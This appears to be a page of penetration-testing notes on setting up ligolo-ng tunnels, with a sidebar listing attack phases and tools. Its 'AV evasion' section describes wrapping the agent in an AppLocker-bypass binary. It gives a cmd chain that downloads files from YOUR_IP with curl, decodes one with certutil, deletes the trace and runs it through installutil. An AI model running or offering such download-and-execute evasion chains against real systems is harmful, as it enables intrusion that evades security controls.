ligolo-ng

You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Applocker or CLM.

sudo apt install ligolo-ng ligolo-ng-common-binaries -y

Basic tunnel

start ligolo-proxy

sudo ligolo-proxy -selfcert

Connect the agent
enter session and list network configuration
```
#in ligolo-ng
sessions
ifconfig
```
set route
1. 1 hop
```
autoroute
start
```
2. 2 hops

AV evasion

Clone the repository

git clone https://github.com/nicocha30/ligolo-ng.git

Edit the ignoreCertificate and serverAddr variables in the following file /ligolo-ng/cmd/agent/main.go

Compile the agent.exe using the following command

GOOS=windows go build -o agent.exe cmd/agent/main.go

Compile as x64 and give the name ApplockerBypassExternalBinary.exe - Github Repo

Encode the file created above with certutil

certutil.exe -encode .\\ApplockerBypassExternalBinary.exe AppLockerBypassLigolo.txt

Rename the agent.exe to ligolo-agent.exe
Serve the files (ligolo-agent.exe and AppLockerBypassLigolo.txt

Upload the files to the target

cmd.exe /c curl http:/YOUR_IP/ligolo-agent.exe -o C:\\users\\public\\try-agent.exe && curl http://YOUR_IP/AppLockerBypassLigolo.txt -o C:\\users\\public\\enc.txt && certutil -decode C:\\users\\public\\enc.txt C:\\users\\public\\ligolo.exe && del C:\\users\\public\\enc.txt && C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\installutil.exe /logfile= /LogToConsole=true /U C:\\users\\public\\ligolo.exe

Quick Checklist

1. Enumeration

2. Initial Access

Phishing

3. Privilege Escalation - Windows

4. Post Compromise

5. Persistence

6. Pivot

Linux AD

Blast Defender

autorecon

nmap

wpscan

fuff

nikto

gobuster

netexec

powerview

msf

rubeus

powersploit

mimikatz

ligolo-ng

ligolo-ng

Basic tunnel

AV evasion